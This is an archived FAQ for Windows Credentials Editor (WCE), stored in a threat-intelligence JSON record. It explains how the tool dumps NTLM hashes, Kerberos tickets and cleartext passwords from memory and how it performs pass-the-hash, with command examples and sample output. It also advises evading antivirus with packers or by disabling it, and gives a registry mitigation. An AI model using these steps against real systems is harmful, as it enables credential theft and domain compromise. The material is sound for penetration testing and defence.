{
	"id": "fd729810-9cba-4688-8c29-5c6439740937",
	"created_at": "2026-04-06T02:11:44.327544Z",
	"updated_at": "2026-04-10T03:24:29.827847Z",
	"deleted_at": null,
	"sha1_hash": "59719f536700db146df18aa96ae501460d8c1f74",
	"title": "Amplia Security - Research - WCE FAQ",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 86331,
	"plain_text": "Amplia Security - Research - WCE FAQ\r\nBy ampliasecurity.com\r\nArchived: 2026-04-06 02:10:30 UTC\r\nWhat is WCE?\r\nWhat is the current version of WCE?\r\nWho should use WCE?\r\nWhat Operating Systems does WCE support?\r\nIs WCE like cachedump?\r\nIs WCE like pwdump?\r\nIs WCE like Cain \u0026 Abel?\r\nWhere can I find more information about how WCE works?\r\nWhere can I find information on how to use WCE on a pentest?\r\nWhat privileges do I need to run WCE?\r\nHow do I list NTLM credentials in memory?\r\nHow do I change my current NTLM credentials?\r\nHow do I create a new logon session and launch a program with new NTLM credentials?\r\nHow can I generate NTLM hashes with WCE? (for testing purposes)\r\nWhat is 'safe mode'?\r\nHow can I write hashes obtained by WCE to a file?\r\nHow can I dump logon cleartext passwords with WCE?\r\nHow can I prevent WCE dumping my logon password in cleartext?\r\nWCE is detected by the antivirus/HIPS. what can I do to avoid detection?\r\nWhat is GETLSASRVADDR.EXE?\r\nWhen should I use GETLSASRVADDR.EXE?\r\nI can't get GETLSASRVADDR.EXE to work. What's the problem?\r\nWho's the author of WCE? Is he also the author of the PSH Toolkit?\r\nHow is WCE better than the PSH Toolkit?\r\nWhat is WCE?\r\nWindows Credentials Editor (WCE) is a security tool that allows to list Windows logon sessions and add, change,\r\nlist and delete associated credentials (e.g.: LM/NT hashes, Kerberos tickets and cleartext passwords).\r\nThe tool allows users to:\r\n- Perform Pass-the-Hash on Windows\r\n- 'Steal' NTLM credentials from memory (with and without code injection)\r\n- 'Steal' Kerberos Tickets from Windows machines\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 1 of 8\n\n- Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and\r\nservices\r\n- Dump cleartext passwords stored by Windows authentication packages\r\nWCE is a security tool widely used by security professionals to assess the security of Windows networks via\r\nPenetration Testing.\r\nWhat is the current version?\r\nThe current version of WCE 32bit is v1.42beta; you can download it here and the current version of WCE 64bit is\r\nv1.42beta; you can download it here. Since version 1.4beta there is also a \"Universal Binary\" which runs on both\r\n32bit and 64bit platforms; you can download it here.\r\nWho should use WCE?\r\nWCE is aimed at security professionals and penetration testers. It is basically a post-exploitation tool to 'steal' and\r\nreuse NTLM hashes, Kerberos tickets and plaintext passwords which can then be used to compromise other\r\nmachines. Under certain circumstances, WCE can allow you to compromise the whole Windows domain after\r\ncompromising only one server or workstation.\r\nWhat Operating Systems does WCE support?\r\nWCE supports Windows XP, Windows 2003, Vista, Windows 7 and Windows 2008 (all SPs, 32bit and 64bit\r\nversions).\r\nIs WCE like cachedump?\r\nNO. Cachedump obtains NTLM credentials from the Windows Credentials Cache (aka logon cache, logon\r\ninformation cache, etc).\r\nThis cache can be disabled and it is very often disabled by network/domain/windows administrators (see\r\nhttp://support.microsoft.com/kb/172931).\r\nWCE will be able to steal credentials even when this cache is disabled.\r\nWCE obtains NTLM credentials from memory, which are used by the system to perform SSO; it uses a series of\r\ntechniques the author of WCE developed and published some years ago.\r\nAlso, cachedump does not allow you to perform Pass-the-hash, nor does it allow you to 'steal' and reuse Kerberos\r\ntickets.\r\nIs WCE like pwdump?\r\nNO. Pwdump dumps NTLM credentials from the local SAM. WCE dumps credentials from memory; which are\r\nused by the system to perform SSO; it uses a series of techniques the author of WCE developed and published\r\nsome years ago.\r\nThis is one of the reasons why you may be able to compromise the whole Windows domain after compromising a\r\nregular server; NTLM credentials stored in memory and obtained by WCE could have been left there, for\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 2 of 8\n\nexample, by Domain Administrators that connected to the server using RDP. In this scenario, pwdump will only\r\nallow you to obtain the NTLM credentials of the local SAM, that will probably be useless, since the server is not\r\nthe domain controller.\r\nAlso, pwdump does not allow you to perform Pass-the-hash, nor does it allow you to 'steal' and reuse Kerberos\r\ntickets.\r\nIs WCE like Cain \u0026 Abel?\r\nNo. WCE and Cain\u0026Abel; are two different tools with different functionality. In fact, Cain\u0026Abel; does not\r\nimplement any of the functionality implemented by WCE, for example:\r\n* It does not implement Pass-the-Hash natively in Windows\r\n* It does not dump NTLM hashes stored in memory (it dumps local and remote SAMs, which is not the same\r\nthing. For more information read Post-Exploitation with WCE)\r\n* It does not implement Pass-the-Ticket for Kerberos\r\n* It does not dump cleartext logon passwords stored in memory\r\n* etc.\r\nThis does not imply WCE is a better tool, Cain\u0026Abel; also implements many things WCE does not, they are just\r\ndifferent tools with different functionality. You should use both!\r\nWhere can I find more information about how WCE works?\r\n\"WCE Internals\" presentation. RootedCon 2011; Madrid, Spain. (download)\r\nWhere can I find information on how to use WCE on a pentest?\r\n\"Post-Exploitation with WCE\" presentation, UBA 2011 - Spanish (download) - English (download)\r\nWhat privileges do I need to run WCE?\r\nYou need local administrator privileges to run WCE and be able to steal NTLM credentials from memory. This is\r\na post-exploitation tool.\r\nYou also need local administrator privileges to perform Pass-The-Hash (change your current NTLM credentials,\r\nor launch a new program in a new Windows logon session with the NTLM credentials specified).\r\nHow do I list NTLM credentials in memory?\r\nBy default, WCE lists NTLM credentials in memory, no need to specify any options.\r\nFor example:\r\nC:\\Users\\test\u003ewce.exe\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 3 of 8\n\ntheuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537\r\nC:\\Users\\test\u003e\r\nIn this case, only one user/credential set is listed. If there are more in memory, more will be displayed.\r\nHow do I change my current NTLM credentials?\r\nwce.exe -s \u003cusername\u003e:\u003cdomain\u003e:\u003clmhash\u003e:\u003cnthash\u003e\r\nFor example:\r\nC:\\Users\\test\u003ewce.exe -s\r\ntestuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nChanging NTLM credentials of current logon session (00024E1Bh) to:\r\nUsername: testuser\r\ndomain: amplialabs\r\nLMHash: 01FC5A6BE7BC6929AAD3B435B51404EE\r\nNTHash: 0CB6948805F797BF2A82807973B89537\r\nNTLM credentials successfully changed!\r\nC:\\Users\\test\u003e\r\nHow do I create a new logon session and launch a program with new NTLM credentials?\r\nwce.exe -s \u003cusername\u003e:\u003cdomain\u003e:\u003clmhash\u003e:\u003cnthash\u003e -c \u003cprogram\u003e\r\nFor example:\r\nC:\\Users\\test\u003ewce.exe -s\r\ntestuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c\r\ncmd.exe\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nChanging NTLM credentials of new logon session (000118914h) to:\r\nUsername: testuser\r\ndomain: amplialabs\r\nLMHash: 01FC5A6BE7BC6929AAD3B435B51404EE\r\nNTHash: 0CB6948805F797BF2A82807973B89537\r\nNTLM credentials successfully changed!\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 4 of 8\n\nC:\\Users\\test\u003e\r\nAt this point, a new cmd.exe instance will be launched and network connections using NTLM initiated from that\r\ninstance will use the NTLM credentials specified. Of course, you can run any program, not just cmd.exe.\r\nThis is feature is very useful, because you can do many tests and do Pass-the-Hash with many different users\r\nwithout having to change your current Windows logon session and credentials.\r\nHow can I generate NTLM hashes with WCE? (for testing purposes)\r\nwce.exe -g \u003ccleartext password\u003e\r\nFor example:\r\nC:\\Users\\test\u003ewce.exe -g mypassword\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nPassword: mypassword\r\nHashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7\r\nC:\\Users\\test\u003e\r\nWhile testing WCE, and other things, it is very common to have the need to generate LM and NT hashes from a\r\npassword. This can be done using the '-g' parameter as shown above.\r\nWhat is 'safe mode'?\r\nWCE is the first and only tool that can read NTLM credentials stored by Windows in memory without injecting\r\ncode. WCE is able to locate and understand the undocumented structures used by Windows to store the\r\ncredentials, find encryption keys and decrypt credentials just by reading the system's memory.\r\nThis technique is very very safe (after all, the tool is just reading memory; thus the name 'safe mode') and tries to\r\nensure that the system where WCE is executed will not crash. This is extremely important if you are a penetration\r\ntester and want to run WCE without risking a server crash.\r\nWCE will automatically attempt to use this technique first when obtaining NTLM credentials from memory;\r\nhowever it will also automatically attempt code injection if the first technique failed.\r\nFor this reason, if you want tu ensure WCE will only attempt to obtain NTLM credentials by reading memory\r\n(without code injection), you can use the -f switch (Force 'safe mode').\r\nExample:\r\nC:\\Users\\test\u003ewce.exe -f\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 5 of 8\n\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\ntheuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537\r\nC:\\Users\\test\u003e\r\nHaving said that, you use the tool under your own risk; no guarantee is given.\r\nHow can I write hashes obtained by WCE to a file?\r\nUse the -o switch. For example:\r\nC:\\\u003ewce -o output.txt\r\nWCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity.com)\r\nUse -h for help.\r\nC:\\\u003etype output.txt\r\ntest:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102\r\nC:\\\u003e\r\nHow can I dump logon cleartext passwords with WCE?\r\nThe -w switch can be used to dump logon passwords stored in cleartext by the Windows Digest Authentication\r\npackage. For example:\r\nC:\\\u003ewce -w\r\nWCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa\r\n(hernan@ampliasecurity com)\r\nUse -h for help.\r\ntest\\MYDOMAIN:mypass1234\r\nNETWORK SERVICE\\WORKGROUP:test\r\nThis video shows the use of the -w switch in a Windows 2008 Server (watch in 720p for best quality).\r\nHow can I prevent WCE dumping my logon password in cleartext?\r\nWhen you login into a Windows system; your cleartext password is handed over to all the Security Packages\r\ninstalled on the system. This includes the NTLM security package (msv1_0.dll) the Kerberos security package\r\n(kerberos.dll), the Digest Authentication Security Package (wdigest.dll) etc. These packages take the cleartext\r\npassword and basically do what they desire with it. For example, the NTLM security package generates and stores\r\nin memory the NTLM hashes discarding the cleartext password, and the Digest Authentication package stores in\r\nmemory the cleartext password encrypted. The techniques invented by WCE precisely consist in extracting from\r\nthese packages these credentials stored in memory.\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 6 of 8\n\nFor this reason, one of the ways to prevent WCE dumping your cleartext login password and other credentials is to\r\navoid loading the Security Packages from which WCE retrieves them.\r\nThese are defined in registry at the following location:\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages\r\nYou will find there a list similar to the following:\r\nkerberos\r\nmsv1_0\r\nschannel\r\nwdigest\r\ntspkg\r\npku2u\r\nYou can remove an item from the list and (after rebooting) Windows will not load the corresponding Security\r\nPackage.\r\nFor example, you can remove wdigest and tspkg and WCE will not be able to dump the cleartext password stored\r\nby these packages simply because they will not be loaded anymore.\r\nAlthough this works, keep in mind that you may encounter problems if your environment uses one of the security\r\npackages removed; you will need to test how this affects you specifically. Also, removing fundamental security\r\npackages like msv_1_0 can have catastrophic consequences, so apply this technique at your own risk.\r\nWCE is detected by the antivirus/HIPS. what can I do to avoid detection?\r\nUse a PE Packer, for example UPX. If UPX does not do the trick, try other PE Packers, there are many out there.\r\nAlso, since you need administrator privileges to run WCE, try disabling the AV/HIPS before running WCE...\r\nWhat is GETLSASRVADDR.EXE?\r\nGETLSASRVADDR.exe is a tool (included with WCE) that can be used to obtain automatically the needed\r\naddresses for WCE to be able to read logon sessions and NTLM credentials from memory (without code injection)\r\nwhen WCE is not able to do it by itself out-of-the-box.\r\nAddresses obtained can then be used with WCE using the -A switch.\r\nThis tool requires the DLLs symsrv.dll and dbghelp.dll available from the \"Debugging Tools for Windows\"\r\npackage.\r\nWhen should I use GETLSASRVADDR.EXE?\r\nBasically, you should use GETLSASRVADDR.exe when you want to use 'safe mode' to extract hashes from\r\nmemory on a system where out-of-the-box WCE is unable to make it work.\r\nGETLSASRVADDR.exe will give you the information WCE needs to get 'safe mode' working.\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 7 of 8\n\nI can't get GETLSASRVADDR.EXE to work. What's the problem?\r\nThe most common source of problems is that you are missing the DLL files symsrv.dll and dbghelp.dll available\r\nfrom the \"Debugging Tools For Windows\" package.\r\nThis is most likely the case if you are getting the following error message:\r\nConnecting to Microsoft.com symbol server...please wait..\r\nError: cannot find symsrv.dll\r\nError: Cannot obtain addresses\r\nRead the presentation WCE Internals for an explanation on why these DLLs are required.\r\nThe tool getlsasrvaddr.exe is meant to be used in the attacker's machine, and not in compromised machines; so\r\nthis requirement should not be an issue.\r\nAnother common issue is having UAC enabled and not being able to access c:\\windows\\system32\\lsasrv.dll. In\r\nthis case, just copy lsasrv.dll to another directory and try again.\r\nWho's the author of WCE? Is he also the author of the PSH Toolkit?\r\nThe author of WCE is Hernan Ochoa (hernan [ at ] ampliasecurity.com); and yes, he is also the author of the now\r\ndefunct Pass-The-Hash Toolkit.\r\nHow is WCE better than the PSH Toolkit?\r\nThe Pass-The-Hash (PSH) Toolkit does not work anymore. It does not support newer updates for Windows XP\r\nand 2003; and it does NOT support Windows 7 and 2008 at all.\r\nWCE is basically a complete rewrite form scratch, it uses new techniques and does automagically lots of things to\r\nmake its use easier and to make it work automatically in more platforms. It also works perfectly with all Windows\r\nversions, including Windows 7 and 2008; and it is the only tool that is able to read credentials just by reading\r\nmemory; which is very important to penetration testers, since this means the chances of crashing a server when\r\nusing WCE are almost zero (although neither the author nor Amplia Security guarantees this in any way; you use\r\nthe tool at your own risk).\r\nAlso, the PSH Toolkit does not allow you to 'steal' and reuse Kerberos tickets.\r\n(Note: remember the author of WCE is also the author of the PSH Toolkit).\r\nSource: https://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nhttps://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://web.archive.org/web/20240904163410/https://www.ampliasecurity.com/research/wcefaq.html"
	],
	"report_names": [
		"wcefaq.html"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441504,
	"ts_updated_at": 1775791469,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/59719f536700db146df18aa96ae501460d8c1f74.pdf",
		"text": "https://archive.orkl.eu/59719f536700db146df18aa96ae501460d8c1f74.txt",
		"img": "https://archive.orkl.eu/59719f536700db146df18aa96ae501460d8c1f74.jpg"
	}
}